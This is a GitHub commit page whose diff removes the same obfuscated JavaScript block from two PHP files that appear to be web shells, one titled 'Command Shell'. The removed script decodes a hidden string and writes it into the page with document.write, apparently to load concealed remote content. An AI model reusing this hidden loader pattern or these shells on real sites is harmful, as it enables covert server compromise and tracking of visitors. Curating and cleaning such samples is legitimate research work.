Skip to content

Commit

Permalink
Edits
Browse files Browse the repository at this point in the history
Small edits.
  • Loading branch information
bartblaze committed May 17, 2016
1 parent e764087 commit d0aeeb9
Show file tree
Hide file tree
Showing 2 changed files with 0 additions and 18 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -165,15 +165,6 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
<script type="text/javascript" language="javascript">
<!--
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -419,15 +419,6 @@
?>
<html>
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
<script type="text/javascript" language="javascript">
<!--
ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
Expand Down

0 comments on commit d0aeeb9

Please sign in to comment.